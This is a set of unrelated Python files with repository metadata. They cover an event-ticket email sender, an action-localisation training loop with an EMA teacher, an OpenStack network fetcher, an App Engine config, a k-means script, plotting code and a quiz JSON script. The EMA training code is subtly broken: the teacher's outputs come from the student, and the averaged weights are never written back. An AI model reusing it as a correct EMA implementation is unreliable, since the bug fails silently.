<div style='color:#000000;font-family:Spoqa Han Sans,sans-serif;font-size:30px;line-height:1.3;letter-spacing:-1.1px; text-align:left'>
OpenInfra Days Korea 2018
</div>
</td>
</tr>
<tr>
<td style='word-wrap:break-word;font-size:0px;padding:0px;padding-bottom:30px' align='left'>
<div style='color:#000000;font-family:Spoqa Han Sans,sans-serif;font-size:20px;line-height:22px;letter-spacing:-0.8px;text-align:left'>
초청 티켓 등록이 완료되었습니다.
</div>
</td>
</tr>
<tr>
<td style='word-wrap:break-word;font-size:0px;padding:0px;padding-bottom:30px' align='left'>
<div style='color:#000000;font-family:Spoqa Han Sans,sans-serif;font-size:20px;line-height:22px;letter-spacing:-0.8px;text-align:left'>
참가 일자 : {1}
</div>
</td>
</tr>
<tr>
<td style='word-wrap:break-word;font-size:0px;padding:0px' align='left'>
<div style='color:#000000;font-family:Spoqa Han Sans,sans-serif;font-size:20px;line-height:22px;letter-spacing:-0.8px;text-align:left'>
<a href="http://invite.openinfradays.kr">티켓 확인</a>
</div>
</td>
</tr>
</tbody>
</table>
</body>
</html>
""".format(name, date)
email = EmailMessage(settings.EMAIL_TITLE, txt, to=(email,))
email.content_subtype = "html"
return email.send()
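# Usage sketch: send_email() formats the attendee name into {0} and the event date
# into {1} of the HTML body, then sends it with the subject settings.EMAIL_TITLE.
# The values below are placeholders, and the call needs a configured Django email
# backend, so it is left commented out.
# send_email(name='Hong Gildong', date='2018-06-28', email='attendee@example.com')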
| 38.071429 | 147 | 0.60272 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,927 | 0.880713 |
c431a581714f033cba2ab3f52062e3fdddf8f0b8 | 5,767 | py | Python | train_ema.py | qym7/WTALFakeLabels | 139738025ab69f287c4fe3c97389a637f1a0b376 | ["MIT"] | 3 | 2021-12-24T09:27:42.000Z | 2022-01-03T10:59:47.000Z | train_ema.py | qym7/WTALFakeLabels | 139738025ab69f287c4fe3c97389a637f1a0b376 | ["MIT"] | 1 | 2021-12-26T02:40:40.000Z | 2021-12-26T02:50:26.000Z | train_ema.py | qym7/WTALFakeLabels | 139738025ab69f287c4fe3c97389a637f1a0b376 | ["MIT"] | null | null | null |
'''
Author: your name
Date: 2021-12-25 17:33:51
LastEditTime: 2021-12-29 10:10:14
LastEditors: Please set LastEditors
Description: open koroFileHeader to view and edit the configuration: https://github.com/OBKoro1/koro1FileHeader/wiki/%E9%85%8D%E7%BD%AE
FilePath: /yimingqin/code/WTAL-Uncertainty-Modeling/train.py
'''
import torch
import torch.nn as nn
import numpy as np
from collections import OrderedDict
import utils
class UM_loss(nn.Module):
def __init__(self, alpha, beta, lmbd, gamma, margin, thres):
super(UM_loss, self).__init__()
self.alpha = alpha
self.beta = beta
self.lmbd = lmbd
self.gamma = gamma
self.margin = margin
self.thres = thres
self.ce_criterion = nn.BCELoss()
self.l2_criterion = nn.MSELoss()
def balanced_ce(self, gt, cas):
loss = 0
count = 0
pmask = (gt > self.thres).float().cuda()
for i in range(cas.shape[0]):
for j in range(cas.shape[-1]):
if pmask[i, :, j].sum() > 0:
r = sum(pmask[i, :, j]==1) / float(pmask.shape[1])
coef_0 = 0.5 * r / (r - 1)
coef_1 = coef_0 * (r - 1)
# _loss = coef_1 * pmask[i, :, j] * torch.log(cas[i, :, j] + 0.00001) +\
# coef_0 * (1.0 - pmask[i, :, j]) * torch.log(1.0 - cas[i, :, j] + 0.00001)
_loss = torch.norm(cas[i, :, j] - pmask[i, :, j], p=2)
loss = loss + torch.mean(_loss)
count += 1
loss = loss / count
return loss
def forward(self, score_act, score_bkg, feat_act, feat_bkg, label,
gt, sup_cas, cas_s, cas_t):
loss = {}
label = label / torch.sum(label, dim=1, keepdim=True)
loss_cls = self.ce_criterion(score_act, label)
label_bkg = torch.ones_like(label).cuda()
label_bkg /= torch.sum(label_bkg, dim=1, keepdim=True)
loss_be = self.ce_criterion(score_bkg, label_bkg)
loss_act = self.margin - torch.norm(torch.mean(feat_act, dim=1), p=2, dim=1)
loss_act[loss_act < 0] = 0
loss_bkg = torch.norm(torch.mean(feat_bkg, dim=1), p=2, dim=1)
loss_um = torch.mean((loss_act + loss_bkg) ** 2)
loss_total = loss_cls + self.alpha * loss_um + self.beta * loss_be
if sup_cas is not None:
loss_sup = self.balanced_ce(gt, sup_cas)
loss["loss_sup"] = loss_sup
print("loss_sup", (self.lmbd*loss_sup).detach().cpu().item())
loss_total = loss_total + self.lmbd * loss_sup
if cas_s is not None:
            # teacher-student constraint
loss_st = self.l2_criterion(cas_s, cas_t)
loss_total = loss_total + self.gamma * loss_st
print("loss_st", (self.gamma*loss_st).detach().cpu().item())
loss["loss_st"] = loss_st
loss["loss_cls"] = loss_cls
loss["loss_be"] = loss_be
loss["loss_um"] = loss_um
loss["loss_total"] = loss_total
print("loss_cls", loss_cls.detach().cpu().item())
print("loss_be", (self.beta * loss_be).detach().cpu().item())
print("loss_um", (self.alpha * loss_um).detach().cpu().item())
print("loss_total", loss_total.detach().cpu().item())
return loss_total, loss
def train(net_student, net_teacher, loader_iter, optimizer, criterion, logger, step, m):
net_student.train()
_data, _label, _gt, _, _ = next(loader_iter)
_data = _data.cuda()
_label = _label.cuda()
if _gt is not None:
_gt = _gt.cuda()
optimizer.zero_grad()
score_act, score_bkg, feat_act, feat_bkg, _, cas_softmax_s, sup_cas_softmax = net_student(_data)
_, _, _, _, _, cas_softmax_t, _ = net_student(_data)
# cas = None
# if net.self_train:
# feat_magnitudes_act = torch.mean(torch.norm(feat_act, dim=2), dim=1)
# feat_magnitudes_bkg = torch.mean(torch.norm(feat_bkg, dim=2), dim=1)
# feat_magnitudes = torch.norm(features, p=2, dim=2)
# feat_magnitudes = utils.minmax_norm(feat_magnitudes,
# max_val=feat_magnitudes_act,
# min_val=feat_magnitudes_bkg)
# feat_magnitudes = feat_magnitudes.repeat((cas_softmax.shape[-1], 1, 1)).permute(1, 2, 0)
# cas = utils.minmax_norm(cas_softmax * feat_magnitudes)
# if step < 10:
# cas_softmax_s = None
cost, loss = criterion(score_act, score_bkg, feat_act, feat_bkg, _label,
_gt, sup_cas_softmax, cas_softmax_s, cas_softmax_t)
    # update student parameters by backpropagation
cost.backward()
optimizer.step()
# update teacher parameters by EMA
student_params = OrderedDict(net_student.named_parameters())
teacher_params = OrderedDict(net_teacher.named_parameters())
# check if both model contains the same set of keys
assert student_params.keys() == teacher_params.keys()
for name, param in student_params.items():
# see https://www.tensorflow.org/api_docs/python/tf/train/ExponentialMovingAverage
# shadow_variable -= (1 - decay) * (shadow_variable - variable)
teacher_params[name] = teacher_params[name] * m + (1 - m) * param
student_buffers = OrderedDict(net_student.named_buffers())
teacher_buffers = OrderedDict(net_teacher.named_buffers())
# check if both model contains the same set of keys
assert student_buffers.keys() == teacher_buffers.keys()
for name, buffer in student_buffers.items():
teacher_buffers[name] = teacher_buffers[name] * m + (1 - m) * buffer
for key in loss.keys():
logger.log_value(key, loss[key].cpu().item(), step)
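# Standalone sketch of the EMA rule used above, on plain tensors: the teacher tracks
# an exponential moving average of the student weights with momentum m. The tensors
# and the momentum value below are illustrative only.
import torch
def ema_update(teacher_param, student_param, m=0.999):
    # shadow = m * shadow + (1 - m) * value, i.e. shadow -= (1 - m) * (shadow - value)
    return teacher_param * m + (1 - m) * student_param
t, s = torch.zeros(3), torch.ones(3)
for _ in range(10):
    t = ema_update(t, s, m=0.9)
# every entry of t is now 1 - 0.9 ** 10, roughly 0.651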
| 38.704698 | 106 | 0.602393 | 2,945 | 0.508899 | 0 | 0 | 0 | 0 | 0 | 0 | 1,567 | 0.270779 |
c43395c47fe6f6295740535434326b1a38c6e0c8 | 3,597 | py | Python | scan/fetchers/cli/cli_fetch_oteps_lxb.py | korenlev/calipso-cvim | 39278a5cf09c40b26a8a143ccc0c8d437961abc2 | ["Apache-2.0"] | null | null | null | scan/fetchers/cli/cli_fetch_oteps_lxb.py | korenlev/calipso-cvim | 39278a5cf09c40b26a8a143ccc0c8d437961abc2 | ["Apache-2.0"] | null | null | null | scan/fetchers/cli/cli_fetch_oteps_lxb.py | korenlev/calipso-cvim | 39278a5cf09c40b26a8a143ccc0c8d437961abc2 | ["Apache-2.0"] | null | null | null |
###############################################################################
# Copyright (c) 2017-2020 Koren Lev (Cisco Systems), #
# Yaron Yogev (Cisco Systems), Ilia Abashin (Cisco Systems) and others #
# #
# All rights reserved. This program and the accompanying materials #
# are made available under the terms of the Apache License, Version 2.0 #
# which accompanies this distribution, and is available at #
# http://www.apache.org/licenses/LICENSE-2.0 #
###############################################################################
from scan.fetchers.cli.cli_fetcher import CliFetcher
from scan.fetchers.db.db_access import DbAccess
class CliFetchOtepsLxb(CliFetcher, DbAccess):
def get(self, parent_id):
vconnector = self.inv.get_by_id(self.get_env(), parent_id)
if not vconnector:
return []
configurations = vconnector['configurations']
tunneling_ip = configurations['tunneling_ip']
tunnel_types_used = configurations['tunnel_types']
if not tunnel_types_used:
return []
tunnel_type = tunnel_types_used[0]
if not tunnel_type:
return []
# check only interfaces with name matching tunnel type
ret = [i for i in vconnector['interfaces'].values()
if i['name'].startswith(tunnel_type + '-')]
for otep in ret:
otep['ip_address'] = tunneling_ip
otep['host'] = vconnector['host']
self.get_otep_ports(otep)
otep['id'] = otep['host'] + '-otep-' + otep['name']
otep['name'] = otep['id']
otep['vconnector'] = vconnector['name']
otep['overlay_type'] = tunnel_type
self.get_udp_port(otep)
return ret
"""
fetch OTEP data from CLI command 'ip -d link show'
"""
def get_otep_ports(self, otep):
cmd = 'ip -d link show'
lines = self.run_fetch_lines(cmd, ssh_to_host=otep['host'])
header_format = '[0-9]+: ' + otep['name'] + ':'
        interface_lines = self.get_section_lines(lines, header_format, r'\S')
        otep['data'] = '\n'.join(interface_lines)
        regexps = [
            {'name': 'state', 're': ',UP,', 'default': 'DOWN'},
            {'name': 'mac_address', 're': r'.*\slink/ether\s(\S+)\s'},
            {'name': 'mtu', 're': r'.*\smtu\s(\S+)\s'},
]
self.get_object_data(otep, interface_lines, regexps)
cmd = 'bridge fdb show'
dst_line_format = ' dev ' + otep['name'] + ' dst '
lines = self.run_fetch_lines(cmd, ssh_to_host=otep['host'])
lines = [l for l in lines if dst_line_format in l]
if lines:
l = lines[0]
otep['bridge dst'] = l[l.index(' dst ')+5:]
return otep
def get_udp_port(self, otep):
table_name = "{}.ml2_{}_endpoints".format(self.neutron_db,
otep['overlay_type'])
results = None
try:
results = self.get_objects_list_for_id(
"""
SELECT udp_port
FROM {}
WHERE host = %s
""".format(table_name),
"vedge", otep['host'])
except Exception as e:
self.log.error('failed to fetch UDP port for OTEP: ' + str(e))
otep['udp_port'] = 0
for result in results:
otep['udp_port'] = result['udp_port']
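# Standalone sketch of the kind of extraction the regexps list above drives: pulling
# the MAC address and MTU out of 'ip -d link show' output with re. The sample text is
# a made-up interface block, not real fetcher output.
import re
sample = ("12: vxlan-0a000001: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1450 qdisc noqueue \n"
          "    link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff promiscuity 0 ")
state = 'UP' if ',UP,' in sample else 'DOWN'
mac = re.search(r'.*\slink/ether\s(\S+)\s', sample).group(1)
mtu = re.search(r'.*\smtu\s(\S+)\s', sample).group(1)
print(state, mac, mtu)  # UP 02:42:ac:11:00:02 1450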
| 43.865854 | 79 | 0.512093 | 2,773 | 0.77092 | 0 | 0 | 0 | 0 | 0 | 0 | 1,449 | 0.402836 |
c433cd175dc051909207a6a2031e2dac3b9eff92 | 612 | py | Python | appengine_config.py | ioriwitte/datavocab | 5f99c679a23a164ab93ac1bcaf9a30a01728ee37 | ["Apache-2.0"] | 13 | 2019-12-03T15:25:55.000Z | 2021-10-16T00:18:47.000Z | appengine_config.py | jesman/schemaorg | 6649c41e56a9724eaeed25dedf67736258f922bf | ["Apache-2.0"] | 11 | 2019-10-16T12:34:11.000Z | 2021-02-04T11:23:03.000Z | appengine_config.py | jesman/schemaorg | 6649c41e56a9724eaeed25dedf67736258f922bf | ["Apache-2.0"] | 9 | 2017-12-13T08:07:48.000Z | 2019-06-18T14:30:12.000Z |
"""`appengine_config` gets loaded when starting a new application instance."""
import vendor
# insert `lib` as a site directory so our `main` module can load
# third-party libraries, and override built-ins with newer
# versions.
vendor.add('lib')
import os
# Called only if the current namespace is not set.
def namespace_manager_default_namespace_for_request():
# The returned string will be used as the Google Apps domain.
applicationVersion="Default"
if "CURRENT_VERSION_ID" in os.environ:
applicationVersion = os.environ["CURRENT_VERSION_ID"].split('.')[0]
return applicationVersion
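# Illustration of the parsing above: on App Engine, CURRENT_VERSION_ID has the form
# '<version>.<deployment id>' and only the part before the first dot is used as the
# namespace. The sample value below is made up.
sample_version_id = "20240101t120000.438594683528037442"
assert sample_version_id.split('.')[0] == "20240101t120000"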
| 38.25 | 78 | 0.756536 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 379 | 0.619281 |
c433ed35cefab756913c6887caed7bdb03a9f9e5 | 270 | py | Python | 10_KNN_3D/main.py | ManMohan291/PyProgram | edcaa927bd70676bd14355acad7262ae2d32b8e5 | ["MIT"] | 2 | 2018-09-07T17:44:54.000Z | 2018-09-07T17:44:57.000Z | 10_KNN_3D/main.py | ManMohan291/PyProgram | edcaa927bd70676bd14355acad7262ae2d32b8e5 | ["MIT"] | null | null | null | 10_KNN_3D/main.py | ManMohan291/PyProgram | edcaa927bd70676bd14355acad7262ae2d32b8e5 | ["MIT"] | null | null | null |
import KNN as K
K.clearScreen()
dataTraining= K.loadData("dataTraining.txt")
X=dataTraining[:,0:3]
initial_centroids=K.listToArray([[3, 3,3],[6, 2,4],[8,5,7]])
idx=K.KMean_Run(X,initial_centroids,5)
K.SaveData(K.concatenateVectors(X,idx))
K.plotKNN2(X,idx)
| 12.272727 | 60 | 0.703704 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 18 | 0.066667 |
c434ee7e49ec7f84e8ed989b7259f62a6d292fde | 3,793 | py | Python | hummingbird/graphics/state_plotbox.py | don4get/hummingbird | ec9da37b74f17702201f475d79b842f41694c095 | ["MIT"] | null | null | null | hummingbird/graphics/state_plotbox.py | don4get/hummingbird | ec9da37b74f17702201f475d79b842f41694c095 | ["MIT"] | null | null | null | hummingbird/graphics/state_plotbox.py | don4get/hummingbird | ec9da37b74f17702201f475d79b842f41694c095 | ["MIT"] | null | null | null |
#!/usr/bin/env python
import pyqtgraph as pg
from pyqtgraph import ViewBox
from hummingbird.graphics.plotter_args import PlotBoxArgs
from hummingbird.graphics.state_plot import StatePlot
class StatePlotBox:
def __init__(self, window, args):
""" Create a new plotbox wrapper object
Arguments:
window (pg.GraphicsWindow): pyqtgraph window object in which to
place this plotbox
args (PlotboxArgs object): PlotboxArgs object which holds all the
appropriate arguments for the plotbox
"""
if not isinstance(args, PlotBoxArgs):
raise TypeError('\'args\' argument must be of type PlotboxArgs')
        # Initialize plotbox
if args.labels is not None:
self.plotbox = window.addPlot(title=args.title, labels=args.labels)
else:
self.plotbox = window.addPlot(labels={'left': args.title})
# Handle dimension parameters
self.dimension = len(args.plots[0].state_names)
if self.dimension == 1:
self.plotbox.setAutoVisible(y=True)
else:
self.plotbox.setAutoVisible(x=True, y=True)
self.plotbox.setAspectLocked() # Lock x/y ratio to be 1
# Handle color parameters
self.set_axis_color(args.axis_color, args.axis_width)
self.distinct_plot_hues = args.plot_hues
self.plot_min_hue = args.plot_min_hue
self.plot_max_hue = args.plot_max_hue
self.plot_min_value = args.plot_min_value
self.plot_max_value = args.plot_max_value
if args.legend:
self.add_legend()
# Plots related to this plotbox
self.plots = {}
for p in args.plots:
self.add_plot(p)
# Other args
self.time_window = args.time_window
def label_axes(self, x_label=None, y_label=None):
if x_label is not None:
self.plotbox.setLabel('bottom', x_label)
if y_label is not None:
self.plotbox.setLabel('left', y_label)
def set_axis_color(self, color, width=1):
self.axis_pen = pg.mkPen(color=color, width=width)
self.plotbox.getAxis("left").setPen(self.axis_pen)
self.plotbox.getAxis("bottom").setPen(self.axis_pen)
def add_legend(self):
self.plotbox.addLegend(size=(1, 1), offset=(1, 1))
def add_plot(self, plot_args):
if plot_args.color is None:
plot_args.set_color(self._get_color(len(self.plots)))
self.plots[plot_args.name] = StatePlot(self.plotbox, plot_args)
def get_states(self):
states = {}
for p in self.plots.values():
states.update(p.get_states())
return states
def get_xrange(self):
return self.plotbox.vb.targetRange()[0]
def get_yrange(self):
return self.plotbox.vb.targetRange()[1]
def update(self, t):
""" Update the plot data and adjust viewing range
Arguments:
t (float): the current time in seconds. Used to adjust the rolling
time window appropriately
"""
for p in self.plots.values():
p.update()
if self.dimension == 1:
x_min = max(t - self.time_window, 0)
x_max = t
self.plotbox.setXRange(x_min, x_max)
self.plotbox.enableAutoRange(axis=ViewBox.YAxis)
else:
self.plotbox.enableAutoRange(axis=ViewBox.XYAxes)
# TODO: Add 3D support here
def _get_color(self, index):
""" Returns incremental plot colors based on index """
return pg.intColor(index, minValue=self.plot_min_value, maxValue=self.plot_max_value,
hues=self.distinct_plot_hues, minHue=self.plot_min_hue, maxHue=self.plot_max_hue)
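# Standalone sketch of the incremental coloring in _get_color(): pyqtgraph's intColor
# spreads plot colors over the hue wheel by index. The hue/value bounds below are
# arbitrary example numbers, not the PlotBoxArgs defaults.
if __name__ == "__main__":
    swatch = [pg.intColor(i, hues=9, minHue=0, maxHue=270, minValue=150, maxValue=255)
              for i in range(4)]
    print([c.name() for c in swatch])  # four distinct '#rrggbb' strings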
| 35.12037 | 108 | 0.627472 | 3,603 | 0.949908 | 0 | 0 | 0 | 0 | 0 | 0 | 842 | 0.221988 |
c4355d1898179dbc210d3d0618bca78d79edd5b7 | 348 | py | Python | quizapp/jsonify_quiz_output.py | malgulam/100ProjectsOfCode | 95026b15d858a6e97dfd847c5ec576bbc260ff61 | ["MIT"] | 8 | 2020-12-13T16:15:34.000Z | 2021-11-13T22:45:28.000Z | quizapp/jsonify_quiz_output.py | malgulam/100ProjectsOfCode | 95026b15d858a6e97dfd847c5ec576bbc260ff61 | ["MIT"] | 1 | 2021-06-02T03:42:39.000Z | 2021-06-02T03:42:39.000Z | quizapp/jsonify_quiz_output.py | malgulam/100ProjectsOfCode | 95026b15d858a6e97dfd847c5ec576bbc260ff61 | ["MIT"] | 1 | 2020-12-14T20:01:14.000Z | 2020-12-14T20:01:14.000Z |
import json
#start
print('start')
with open('quizoutput.txt') as f:
lines = f.readlines()
print('loaded quiz data')
print('changing to json')
json_output = json.loads(lines[0])
print(json_output)
with open('quizoutput.txt', 'w') as f:
    json.dump(json_output, f)  # json_output is a parsed object, so serialize it back to JSON text
# for item in json_output:
# print(item['question'])
# print('done')
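# Round-trip sketch of what the script above does, on an in-memory example instead of
# quizoutput.txt. The quiz item below is invented for illustration.
line = '[{"question": "2 + 2?", "answer": "4"}]'
items = json.loads(line)
print(items[0]['question'])          # -> 2 + 2?
print(json.dumps(items, indent=2))   # pretty-printed form that could be written back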
| 19.333333 | 38 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 158 | 0.454023 |